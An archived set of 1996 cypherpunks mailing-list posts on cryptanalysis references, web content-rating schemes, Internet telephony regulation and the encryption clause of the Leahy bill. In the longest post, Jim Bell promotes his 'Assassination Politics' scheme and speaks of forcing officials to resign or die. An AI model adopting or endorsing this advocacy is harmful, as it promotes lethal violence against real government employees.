>network safe for financial transactions.  OM-Transact doesn't come cheap --
>it's priced at $250,000 per license.  Another new product, OM-Axcess, allows
>companies to monitor and control access to the Internet by both employees
>and customers.  It costs $35,000 a copy.  (Investor's Business Daily 5 Mar
>96 A8)

>Edupage is written by John Gehl (gehl@educom.edu) & Suzanne Douglas
>(douglas@educom.edu).  Voice:  404-371-1853, Fax: 404-371-8057.  

>Technical support is provided by the Office of Information Technology,
>University of North Carolina at Chapel Hill.

>***************************************************************
>EDUPAGE is what you've just finished reading.  To subscribe to Edupage: send
>a message to: listproc@educom.unc.edu and in the body of the message type:
>subscribe edupage Feodor Dostoevski (assuming that your name is Feodor
>Dostoevski;  if it's not, substitute your own name).  ...  To cancel, send a
>message to: listproc@educom.unc.edu and in the body of the message type:
>unsubscribe edupage.   (Subscription problems?  Send mail to
>educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Mar 1996 11:04:24 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptanalysis
Message-ID: <ad676d9b0c021004b946@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 PM 3/9/96, E. ALLEN SMITH wrote:
>From:   IN%"tcmay@got.net"  9-MAR-1996 12:05:04.70
>
>>There are very good reasons to say little about "conventional
>>cryptanalysis": it just doesn't matter much with modern ciphers, such as
>>public key systems. Modern ciphers don't fall to conventional attacks based
>>on word frequency, pattern analysis, etc.
>
>        I realize that this may also be considered an out of date subject,
>but what's a good reference for codes as opposed to cyphers (other than
>the one reference in the Cyphernomicon which includes "codes" in its title)?

The usual: Kahn, Denning, and some of the old Dover Press books on crypto.
Also, Herbert Zim wrote a nice little book about 40-50 years ago on codes.
Some of the standard crypto textbooks will of course have more pointers to
cryptanalysis. (Not to sound harsh to Allen, but why would anyone ask here
on the list for recommendations to such a standard subject when Schneier,
Garfinkel, Denning, etc. all have books listed?)

Again, the reason stuff like "word frequency counts" and "index of
coincidence" notions are so seldom involved in modern crypto--which is what
all public key systems involve--is that they are essentially of no use.
There is no point in doing statistical analysis of patterns on the
ciphertext in an RSA or similar encryption. (Because any "patterns"
discovered are meaningless.)

And there are so many interesting areas to pursue with using and furthering
modern crypto, that I just can't understand how people can think that
classical cryptanalysis is useful. It might be fun, as a hobby, but it has
no bearing on modern systems. (Well, I'm exaggerating a bit. I suspect that
classical cryptanalysts at the NSA or GCHQ might have some insights into
some problems with modern systems, such as traffic analysis. So I shouldn't
say there is "no use" for it. But I hope you all understand my point in
general. It is unlikely in the extreme that anyone who fools around a
little with classical cryptanalysis will have anything important to
contribute as a result of this.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 09:09:47 +0800
To: cypherpunks@toad.com
Subject: The attempt to limit Internet phoning
Message-ID: <01I2595560U2AKTUGH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I somewhat doubt the below is correct in their believing their actions
are the reasons for the anti-Internet-phone move. The recent announcement by
2 New Jersey companies of a service whereby someone with a computer linkup
can call someone without it (on Reuters on Yahoo) would appear to be a
better explanation.
	-Allen

From: Francisco Lopez <d005734c@dcfreenet.seflin.lib.fl.us>

Date: Thu, 7 Mar 1996 23:31:18 -0600
From: Gleason Sackman <sackman@plains.nodak.edu>
To: Multiple recipients of list NET-HAPPENINGS
     <NET-HAPPENINGS@LISTS.INTERNIC.NET>
Subject: MISC> 'VON/FWD/IPHONE' ACTIVITIES CONSIDERED "MISUSE OF THE INTERNET" - BY ACTA (130 USA Long Distance Telephone Carriers)

Date: Wed, 6 Mar 1996 21:00:08 -0500 (EST)
From: Jenny Jacobson <jenny@dsl.pitt.edu>

---------- Forwarded message ----------
Date: Wed, 6 Mar 1996 15:03:07 -0500 (EST)
From: Sandy Combs <scombs@together.net>
To: free-world-dialup@pulver.com
Subject: [Free World Dialup]: 'VON/FWD/IPHONE' ACTIVITIES CONSIDERED "MISUSE
OF THE INTERNET" - BY ACTA (130 USA Long Distance Telephone Carriers)

      *******************************************************
      VON ALERT -- FWD ALERT --IPHONE ALERT -- NETWATCH ALERT
      *******************************************************

It appears that our recent FREE WORLD DIALUP press release was the straw
that broke the camel's back.

The FCC was petitioned yesterday by ACTA "TO STOP MISUSE OF THE INTERNET".

The sale and use of Voice-On-the-Net (VON) software is being challenged by
130 of the USA's largest long distance telephone carriers.  Among them, MCI,
SPRINT, and LDDS.

According to the ACTA press release:

"A growing number of companies are selling software programs with ancillary
hardware options that enable a computer to transmit voice conversations.
This, in fact, creates the ability to "by-pass" local, long distance and
international carriers and allows for calls to be made for virtually 'no cost.'"

And also, "...the misuse of the Internet as a way to "by-pass" the
traditional means of obtaining long distance service could result in a
significant reduction of the Internet's ability to transport its ever
enlarging amount of data traffic."

'VON' COALITION BEING FORMED

A VON Coalition is currently being formed and members will testify at the
spring meeting of the FCC when they discus telephony issues.

If you don't want to loose your right to VON technology, NOW is the time to
be counted.

WHAT CAN I DO?

We need an immediate head count of those on these lists that CARE ENOUGH TO
BECOME INVOLVED!

Subscribe RIGHT NOW to this SPECIAL VON Coalition list: vonYES@pulver.com

To subscribe: VON Coalition List

1)  send E-MAIL to: majordomo@pulver.com
2)  leave the SUBJECT blank
3)  in the BODY write -  subscribe vonyes

To subscribe: VON Coalition List Digest

1)  send E-MAIL to: majordomo@pulver.com
2)  leave the SUBJECT blank
3)  in the BODY write -  subscribe vonyes-digest

Further discussions regarding the VON Coalition will be posted to the above
only.

If you DO NOT act TODAY, your rights and FREE TELEPHONE via the internet may
well be lost!


Jeff Pulver
Sandy Combs
[your name here]

(Press Release distribution authorized by, Jennifer Durst-Jarrell, Executive
Director, ACTA 3/5/96)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@larry.infi.net>
Date: Sun, 10 Mar 1996 09:07:58 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: steganographic trick
In-Reply-To: <199603072228.OAA24671@netcom18.netcom.com>
Message-ID: <Pine.SV4.3.91.960309191026.18734A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir,

Imagine you're an FBI agent or something like that.  You've been assigned 
to investigate some guy, to include sniffing out any data he may have 
stored in encrypted format to keep private.

You de-crypt the data from some elaborate stego scheme, and find - a 
recipe for chocolate cookies.

The federal agents I know, are clever enough to say to themselves: 
"what's wrong with this picture?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 09:06:37 +0800
To: tcmay@got.net
Subject: Re: SurfWatch
Message-ID: <01I259NQ7CKWAKTUGH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  8-MAR-1996 20:20:53.36

>>The question I have is if these systems were widely implemented, could
>>an Web page author or provider of content be sued for "mislabeling"
>>their page?  If so, under what circumstances?  Could the RSAC attach

>Again, I ask about what sort of _contract_ is involved? (In my case, none.
>So, suppose I decide that my post, explaining the fraud that is Islam,
>should be read by all Muslims. AllahAllowed, an Islamic rating service, is
>upset. Just what is their recourse? I have no contract with them and have
>not arranged to label my posts. So, who can sue? The government? Try the
>First Amendment.

	Given various anti-obscenity laws that the idiot Supreme Court has
already found constitutional (including those against providing "indecent"
material to minors), I wouldn't depend on the First Amendment. Here are some
scenarios under which rating services could turn into bona-fide censorship
(by the governmental limiting of information access definition):
	A. The government threatens ISPs with more direct censorship (a la the
CDA) unless they force their users to rate their pages with some such service.
	B. The government finds someone guilty of providing indecent materials
to minors for not having put a rating on their web pag using some such company
- or even all the companies' rating systems. I.e., under nonsense such as
attractive nuisance laws.
	C. The government (a la the V chip) requires a rating system, or one
of a collection of "government-approved" rating systems, for all web pages.
	D. The government in a country such as China uses rating systems to
help them filter.
	E. The government uses already-existing ratings to easier find web
pages to shut down upon its instituting a censorship plan. (This is the gun
registration argument).

These last two don't mean that people shouldn't be permitted to create rating
systems for obscenity/whatever - just that responsible people shouldn't
encourage them in doing so. Now, except for the last two, these can be gotten
around by being in the right country (one not doing such evil acts), but it
would be preferable if that weren't the only way to avoid them. Discouraging
rating systems in the first place can help to do so.
	Please note that I'm making a distinction between rating systems
involving placement on the web page to be rated, and other ones. The
keyword-based ones get around the above arguments (except possibly D and E).
as do the central database ones in which someone else is doing the rating.
(They do not get around the question of whether parents should be permitted to
restrict children's information access on grounds such as obscenity at all.
Given that no harm has ever been proven from children's viewing such material
(_possibly_ unlike the data on violence, although that is quite disputable and
not an argument for censorship), whether parents properly have that degree of
sovereignty over their children is questionable. Children are not the property
of their parents.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 10:14:48 +0800
To: cypherpunks@toad.com
Subject: Assasination Politics Thread #3
Message-ID: <01I25A47RE3MAKTUGH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))

>"E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> wrote:

>>	Has it? Currently, we've got the guys who deal with the public (the
>>politicians and the low-level bureaucrats) and the faceless drones (the rest
>>of the bureaucrats). The politicians can be protected, and already are to
>>some degree. The low-level bureaucrats aren't _that_ likely to be targeted
>>by enough people to make a difference, and the ones who go bad enough to do
>>so can be protected (or sacrificed, if that seems to be the way to keep the
>>public happy). The faceless drones can be even more faceless, and so very
>>hard to target.

>Just a question to you:

>What makes the faceless drones powerfull?

	The classification of low-level bureaucrat known as a cop. See above
for the problems with them.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 10:04:51 +0800
To: jsw@netscape.com
Subject: Re: SurfWatch
Message-ID: <01I25AB1E1DIAKTUGH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jsw@netscape.com"  "Jeff Weinstein"  9-MAR-1996 04:41:47.02

>  I predict that 6 months after the first internet rating system is widely
>deployed, the largest use of search engines such as altavista will be to
>look for pages with the most "naughty" ratings.  Perhaps such services will
>allow text searches for free, but charge for searches based on the rating
>tag...

	Unfortunately, AltaVista doesn't index based on comments field (in
which category the SafeSurf ratings fall). Opentext, given that one supposedly
can search for links to a page, may be able to do it on the other hand.
Putting together a web spider that would search for such could be a profitable
undertaking. I did some checking on AltaVista and found one service by the
name of "Naughty Lynx" which automatically checks all of its links every hour
or so - one problem with "adult-oriented" sites is that they disappear a lot.
Some such feature would probably be necessary. Seems to be a good potential
use of the DigiCash system, since one doesn't need merchant anonymnity that
much until someone comes up with anonymous-location web pages; the Naughty
Lynx system appears to support itself via advertising). Combining this with a
web proxy would also be good.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 14:17:01 +0800
To: janzen@idacom.hp.com
Subject: Re: Vexatious Litigants  (was: SurfWatch)
Message-ID: <01I25AISROZKAKTUGH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"janzen@idacom.hp.com"  "Martin Janzen"  9-MAR-1996 09:48:42.59

>ObCrypto, sort of:  What if the page were retrieved through an HTTP
>proxy which, unbeknownst to the author (and the filtering service/SW),
>deliberately removes or alters the PICS-Label or other rating
>information?  The author did, after all, _provide_ the "undesirable"
>material....  To what extent does the author's intent matter?  Must Web
>authors now add a digital signature to each page (including its rating
>info), to prevent tampering? 

	Good idea, and one that I should have remembered thinking of before
with my comments on a "rating-searching" search engine. If it's providing web
proxying on such links, including removal of potentially-exclusive ratings
would be a good idea. (Running the system on a secure server would also be
a good idea).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 10:30:56 +0800
To: tcmay@got.net
Subject: Re: Cryptanalysis
Message-ID: <01I25ASYNMT6AKTUGH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  9-MAR-1996 12:05:04.70

>There are very good reasons to say little about "conventional
>cryptanalysis": it just doesn't matter much with modern ciphers, such as
>public key systems. Modern ciphers don't fall to conventional attacks based
>on word frequency, pattern analysis, etc.

	I realize that this may also be considered an out of date subject,
but what's a good reference for codes as opposed to cyphers (other than
the one reference in the Cyphernomicon which includes "codes" in its title)?
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 10 Mar 1996 12:33:06 +0800
To: cypherpunks@toad.com
Subject: jim bell
Message-ID: <199603100358.TAA09779@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


* WARNING *
This post may contain offensive materials including the names of certain 
Senators.  Parental supervision is highly advised.
* WARNING *


I think I have a problem.
Jim Bell's assasination politics rants are beginning to make sense.

I can't believe I said that.
Time to see a shrink.

Bye.

ObPerry: None.  So EXON off.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Mon, 11 Mar 1996 08:38:58 +0800
To: Marc North <mnorth@netcom.com>
Subject: Re: Index of Coincidence
In-Reply-To: <Pine.SUN.3.91.960309113033.18346B-100000@netcom12>
Message-ID: <Pine.A32.3.91.960309200124.5902A-100000@POWERED.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> I'm looking for detailed information on a statistical tool to aid in
> cryptanalysis called an "index of coincidence".  I would appreciate it if
> someone could please explain what this is, how one builds such an index
> against a given ciphertext, and how it is valuable in the cryptanalysis of
> said ciphertext. 

Given a ciphertext X with discrete components x[1], x[2], ... x[n],  I[c] 
is the probability that two random elements of x are identical.

Ben.

Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then 
I will never know happiness. For I am possessed by a fever for knowledge, 
experience, and creation."                                      -Anais Nin
Want to give a soon-to-be college grad a job?         Mail me for a resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Sun, 10 Mar 1996 10:53:54 +0800
To: cypherpunks@toad.com
Subject: Re: U.S. State Dept criticizes Chinese net-censorship
Message-ID: <9603100116.AA29320@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Paul said:
>examples set for him by those who are his mentors. If man turns 
>predatory, it is because he found that set of behaviors best suit his 
>needs of the moment - otherwise he would seek other ways of fullfilling 
>those needs. 

>Hence - we are not rational creatures.

Well, I do not agree with that statement.  Even if most individuals
are not acting on rational basis, it does not mean that Man is not 
a rational animal.  Man exercise thought and reason in a volitional
manner.  Wether he decides or not to do it is another thing.

So  many peoples *actively* avoid thinking and yet, it is the only
way they could survive if it were not of others...  In a sense,
they are free-riders.  To think and use reason requires efforts.
I guess that they just do not like exercising...

Regards

JFA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMUHk4siycyXFit0NAQG9rwgAngIpFTTbaJXBG+u3fiLPdMhDl9VOTHAW
nIxuRZ1AkMbXZbJXYeY97C0BLxMt7PqQInDUL0eW68GwAt2F7LqUuhdKh64QXwi+
7jHas+/RCDj/CkxifHZv67uNPuIb7k0mDH8hHumsF0rUXT93P8yNWAMeL6z7dBnG
M2vapstNpxwhmX+u9La3smoGDQniJ2XkQ7VDIcM9rfDrIl1Z3lmuzmpxn+HuxMJm
i38fbmBuouL7WtxRhv0F8qVdz05O21+3tn7L303UWS21ffw8Su970gvHwDr6F0HU
vLmpN6zv/s1mgqF7gTAb5GUizmH2vwjgR7/5kzH7GViKl4ZI5cY1EA==
=JmUo
-----END PGP SIGNATURE-----

 Public Key at http://w3.citenet.net/users/jf_avon
    Jean-Francois Avon <jf_avon@citenet.net> 
    2048 bits key ID:C58ADD0D  1996/03/01    
fingerprint=52 96 45 E8 20 5A 8A 5E  F8 7C C8 6F AE FE F8 91 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Mar 1996 13:25:29 +0800
To: djw@vplus.com
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <m0tvcTx-0008y3C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 06:23 PM 3/9/96 -0800, Dan Weinstein wrote:
>On  9 Mar 96 at 9:26, you wrote:
>
>> >I agree with your concerns here, but I find it hard to believe that
>> > the courts would allow a broader interpretation.
>> 
>> Unfortunately, what you find "hard to believe" I find easy to
>> believe.  Remember, if this bill is passes, it doesn't merely affect
>> YOU, it affects ME.  So I suggest the burden of proof is on YOU to
>> show that these provisions aren't going to be maliciously
>> interpreted by the courts.
>
>Burden of proof?  Sorry, I do not have to justify my views to anyone. 
> I am trying to have a reasonable discussion of this issue, thus, the 
>"burden of proof" lies equal on each of us. 

Well, you're arguing in apparent favor of a segment of a bill which CHANGES 
current law.  Moreover, you're suggesting that we should trust the 
government's biased future interpretation of the ambiguous wording.  Since 
that clause doesn't really have to be there for the rest of the bill to 
stand by itself, I'd say it's fairly obvious that the burden of proof is on 
you.  I'm arguing, on the other hand, that there is danger in ambiguity, and 
there is!

>> >Here you are dead wrong, the bill specifically states: "in
>> >furtherance of a felony."  Its like those laws that let them charge
>> >someone with murder in the first if someone dies while you are
>> >commiting another felony.  They must prove the original felony
>> >before they can get you on the murder one.  The real purpose of
>> >this provision, as I read it, is to give longer sentences to
>> >criminals that use crypto.
>> 
>> I'm not a lawyer, but I assume neither are you.  Please explain the
>> LEGAL DEFINTION of "in furtherance of a felony."  If you can't, then
>> you simply don't know how far they will go.  And you're depending on
>> the reasonableness of the government for the interpretion.
>
>True, I am not a lawyer.  I would like to hear from one of the 
>lawyers on the list for a more deffinitively.  Since you also admit 
>you are not a lawyer, I do not accept your opinion as superior to 
>mine.

Please note my more recent commentary to "all" where I point out that it is 
the INFORMATION which is to be "in furtherance of a felony," not the action 
of the person doing the encryption.  Like I pointed out, the sentence is not 
diagrammed, but I think it's fair to conclude that knowledge of the details 
of the information is unnecessary to be guilty under this section of the 
bill, merely the fact that you're using encryption to hide SOMETHING WHICH 
_MIGHT_ BE INFORMATION "IN FURTHERANCE OF A FELONY."

We're getting into pretty dangerous territory, I think.

>  I was pointing it out as something that I believed you had 
>missed.  I find it hard to believe that anyone can further a felony 
>when their is no felony.

They used to prosecute conspiracies when there was no crime!  Did you know 
that?  In the late 1800's, it was not illegal for a worker to endeavour to 
have his salary increased, but union membership ("a conspiracy") was ILLEGAL!
In other words, a conspiracy to do a legal thing was illegal.

>  In addition, this is VTW's interpretation 
>based on the analysis that they have posted to their home page.  I 
>would presume that they were using lawyers to analyze the bill.

I seriously doubt it.  I haven't gotten a response from Mr. Safdar, yet, 
which I consider to be suspicious.  If he's confident of his position he'll 
back up his interpretation with whatever legal advice he used to decide on 
his original support.  My guess is that he simply read the bill in a sloppy 
fashion, jumped to the conclusion that the writers of the bill hoped we'd 
do, and wrote up his support without a lawyer's advice.


>> >> Fourth, I gave what I considered to be a clear example of the
>> >> hypothetical misuse of an encrypted remailer by the cops, one
>> >> that would arguably make the remailer operator guilty of some
>> >> "reasonable" anti-kiddie-porn statute.  At that point, _he_is_
>> >> the target of the investigation.  Unless you can show that this
>> >> kind of action by the government is impossible, I consider it to
>> >> be not merely possible but almost certain to occur.
>> >
>> >Again, the problem I see with your scenario is that I don't believe
>> > that the courts will interpret it that way. 
>> 
>> What you think is irrelevant.  Most people probably didn't realize
>> what the government did in the Amateur Action BBS case was "legal,"
>> either.  But they did it anyway.
>
>Yes, this case was certainly a travesty.  The thing about it was that 
>it violated the law.  Their actions took place in California, but 
>they were tried in Tennessee.  This is a violation of U.S. law.  
>Again, this is my non-professional opinion, but I have heard several 
>professionals proclaim that the governments actions seriously 
>violated its own laws.

Yes, it was a "travesty."  But it was a travesty because the people involved 
simply didn't care whether what they did looked kosher to the average 
BBS/net user, and figured the average citizen wouldn't care.


>If your point is that the government does 
>not obey its own laws, then all I can say is that if that is how you 
>feel then why oppose the bill?  Won't they end up doing what they 
>want anyway?

Not if I have my way about it.  I assume you are aware that I'm the author 
and primary proponent of my "Assassination Politics" essay.  I consider it 
essentially inevitable.  Moreover, with the exception of a few killings done 
by perfectly anonymous people, it should be entirely legal by current 
black-letter law.  This should eventually eliminate the ability of the 
government to cause the kind of outrages we've all heard about,  such as the 
SJ Games case, Amateur Action case, and of course Waco and Ruby Ridge, along 
with many others.  Once adopted, any government employee who pisses off even 
a tiny fraction of the population would either resign or die, or both, and 
you'd never have to wonder whether a government-hired murderer would get 
away with his crimes.

You need to understand that long before I started publicizing this idea, I 
was fully aware that the government would have to do something to prevent 
this from happening:  They'd have to write new laws to make crimes out of 
things that were not formerly crimes.  I believe that they are trying to do 
exactly this with this new law:  What they want to do is to be able to 
prosecute people who are doing nothing more than collecting "bets" and 
paying off "winners" in a "lottery" that government employees can only lose, 
fatally.

In short, the government is trying to head off "crypto-anarchy," which I 
guess is Tim May's trademark.  I suggest that we don't allow them to; it 
will merely make the government's eventual end even bloodier.


>> Are you assuming that you have the key?  Remember, if you run an
>> encrypted anonymous remailer, and assuming you do it honestly, you
>> won't be keeping records as to the source of the note.
>>
>> Thus, if they "serve a warrant" and you CAN'T decrypt the message
>> (or tell them where it came from) then why aren't you already
>> guilty?  Remember, the wording of the proposed law doesn't require
>> that you have full knowledge of the crime involved, merely that you
>> act "in furtherance" of it...   If you don't possess the key, but
>> you explicitly ran your remailer so that you never it, just so you
>> couldn't relinquish it, you have structured your operation too
>> thwart any investigations.  You are ALREADY guilty.  This may not
>> sound reasonable, but the government no longer (if it ever did)
>> considers "reasonableness" to be an impediment to their actions.
>>
>
>I don't but this.  If I am a reporter if I receive an anonymous tip, 
>a court could order me to tell who my source was, but I couldn't and 
>they couldn't do anything about it unless they could prove that I 
>knew who the source was.  If I knowingly aranged for the source not 
>to reveal himself to me, could I them be charged with obstruction of 
>justice or contempt of court?  Again it is my non-profesional 
>opinion, but I really doubt this. Comment from a lawyer would be 
>appreciated.

You shouldn't use the example of a "reporter."  See, due to the 1st 
amendment (and the fact that news organizations are rich and influential) 
the law tends to defer to the media in situations where it shouldn't.  For 
example, a reporter can usually refuse to give sources for information, but 
ordinary citizens can't refuse to testify against other people in an 
analogous way.  (I'm not saying the reporter should be forced to testify; 
I'm saying the average citizen should NOT be!)   Citing the example of a 
reporter is therefore misleading, because you could be correct about the 
current interpretation in that instance  but not if you tried to apply this 
analogy to the operator of an anonymous remailer.

 
>> >I disagree, it states you must "willfully endeavor" to use the
>> >encryption as a means of obstructing the investigation.  To me,
>> >this means that it is the motivation for using the encryption. 
>> 
>> Question:  What, exactly, is the motivation of a person running an
>> anonymous remailer?  His motivation is clear:  To allow people to
>> send anonymously untraceable messages.  Assuming he's of ordinary
>> levels of intelligence or beyond, he is aware that somebody may some
>> day use his system for illegal purposes.  You're going to have to
>> explain why a court _CAN'T_ interpret this as being in violation of
>> the law.
>> 
>
>If I rent cars, someone might one day use a car rented from me in a 
>robbery.  Does that make my an accessary?  NO.

Again, your example is misleading.  Manfacturers and suppliers of goods and 
services that are rich and have been around a long time have hired lobbyists 
to get politicians to formulate laws that are "friendly" to their particular 
business.  Anonymous remailers, on the other hand, have little budget, none 
for lobbying, and they have no "history" of court cases that back up their 
rights in these matters.  Cite all the cases you want from "smokestack 
America" and it'll get you nowhere:  Juries may sympathize with car rental 
places (who at least do a credit check on their customers, BTW) but there's 
no guaranteee they'll sympathize with a remailer whose "only" function is to 
disguise the source of a message.

 >> > If I set 
>> >up an encrypting remailer for the purpose of allowing free exchange
>> > of ideas, I don't believe I would be liable under this law.
>> 
>> Your optimism is touching.  It is also vastly misguided.
>
>If you think I am optimistic, you must think just about everyone is 
>an easy dupe. 

Well, so far, a number of organizations seem to have fallen for this bill.  
Most of them are smart enough to be worried about this section, but the 
problem is that they are not aware of how bad the problems are.  They have 
no imagination; they don't try to answer the question, "How can this law be 
abused?"

> If I do not quite reach your level of paranoia, I 
>apologize; I will try to get to where I distrust everyone like you. 
>Or are you just plotting to make me paranoid?

If you've already admitted that the Amateur Action BBS case was a 
"travesty," then how in the world can you call me "paranoid"?    As the 
saying goes, "You're not paranoid if the ARE out to get you!"


>> >The 
>> >only way I could see a remailer charged under this is if he had
>> >solid evidence that a specific user was violating the law, and took
>> >no action.
>> 
>> Gee, I wish you were right, but my experience with government thugs
>> says that they will do anything they think they can get away with.
>> 
>
>Their is certainly A LOT of that with in our government, but to claim 
>everyone in the government is a jack-booted thug is just too far over 
>the top for me. (Yes, yes I realize you think this is niave.)

It doesn't take "all" of them to be thugs for a bill such as this to be 
abused.  The scum rises to the top, or floats to the bottom.
 

>> >I see some real problems too, but I do not see the problems with
>> >this provision to be enough to condemn the entire bill.
>> 
>> I don't "condemn the entire bill."  I would, however, reject the
>> entire bill if that provision remains.  And morever, if we make a
>> serious attempt to have it removed, the more they resist removing it
>> the more we should insist it go.
>
>I don't want it removed, I think it is an important bone to through 
>to those in the middle.

In the "middle" of what?  The public?  Or a few self-interested politicians? 
 If it's the latter, I'd say "fuck 'em!"  If the only way they'll pass the 
rest of the bill is to have that portion of the bill there, then they must 
think that portion of the bill is REAL IMPORTANT!   And if they think that, 
you need to ask yourself WHY is it so important to them?

Sorry, but _I_ know why it's so important to them; the power and even their 
very lives are on the line.


>  I would like the phrasing tightened up so 
>that it could only be used against those that deserve it.

Who "deserves it"?  And why wouldn't you be satisfied with convicting them
of whatever crime they are presumably already guilty of?!?

>> There would still be a problem.  What's the definition of "actually
>> involved in committing the felony"?  Are you aware, for example,
>> that manufacturers of small plastic screw-top vials have been
>> prosecuted and convicted simply because their vials could be used to
>> hold small quantities of drugs such as cocaine and crack?  This was
>> a case from a few years back, BTW.  I wish I could remember the
>> cite.
>
>I was not proposing that exact language, I am not a lawyer and don't 
>imagine I could come up with the bullet-proof wording that is 
>required.
> 
>> If you're not aware of these things, WAKE UP!  Your optimism
>> disgusts me, because it is entirely unrealistic and based on a
>> rose-colored-glasses view of the government.
>
>I am not aware of the vial case; I certainly would find such a thing 
>interesting to read. 

That's the problem:  These kinds of cases are often not well publicized.  
People like you get a vastly over-optimistic view of "the law" when you 
don't know the distances the thugs will go to persecute and prosecute people.  

> If this was what happened, and laws exist that 
>allow this, then we ought to repeal those laws, but I don't see the 
>baring that has on this case; I have already said that they should 
>narrow the language so that it will not be used to the ridiculous 
>extream.

Question:  let's suppose the wording of this section of this bill CAN be 
"used to the ridiculous extreme"?  If we presume that the people who wrote 
this bill were intelligent and knew what they wanted, why would not not 
conclude that "the ridiculous extreme" is EXACTLY what they wanted?  And if 
that's the case, then we'd damn well better figure out just how "ridiculous" 
those extremes are!

>> >> Any explanations, Dan?
>> >
>> >You are talking about the fringe, this, I think, was added as an
>> >attempt to bring in those that are in the middle. 
>> 
>> Why would "those that are in the middle" object to a bill which is
>> little more than a re-statement of rights we already believe we
>> have?!?
>
>I am not talking about reality; I am talking about what they can tell 
>the voters if they are beat up over passing such a bill.  You seem to 
>over rate the average voters grasp of the issues.  It doesn't matter 
>that the bill really creates or diminishes crime, it is how the 
>voters can be made to perceive it.

I've already pointed out that "the average citizen" is unaffected by crime 
whose investigation can be "thwarted" by the use of encryption.  You're 
going to have to explain why such a section is even there: Who is it going 
to appease, and why?


>> > That is, Those 
>> >that see the need to prevent the use of encryption as a means of
>> >obstructing justice, but feel that we should also have a right to
>> >privacy.
>> 
>> There is no viable middle ground here.  Any tool can be abused.
>>
>
>If that is true, than you are left with those that are the oppressed 
>and the jack-booted thugs.  I do not believe that the only motivation 
>of those that are opposed to strong encryption is to oppress me.  
>Many are trying to do what they think is right, this provision is 
>their to give those that are tetering between the two options an easy 
>way to move to our side.

You mean POLITICIANS, don't you?  Not ordinary citizens!

>> >  To say that there is no delema here is ridiculous, crime is 
>> >a serious problem that we are already having a terrible time
>> >dealing with. 
>> 
>> On the contrary, my opinion is "The _government_ is a serious
>> problem that we are already having a terrible time dealing with."  
>> Fortunately, I've found a solution, and the government is trying as
>> hard as it can to prevent it (and "crypto-anarchy" in general) from
>> taking root.
>>
>
>Good premise, now if you could sell that premise to everyone in 
>Congress than your right this provision is useless.  Unfortunately, I 
>don't think you will have much luck with this.

The reason I can't "sell this premise to everyone in Congress" is that it is 
exactly those people who are the problem!   And my solution involves either 
535 resignation letters or 535 coffins, whichever.  And they are reacting 
predictably.


>> > I think Leahy realizes that this provision will be about as 
>> >useful as the "use a gun, go to jail" laws, but wants to give those
>> > in the middle to say that they bill will help prevent crime.
>> 
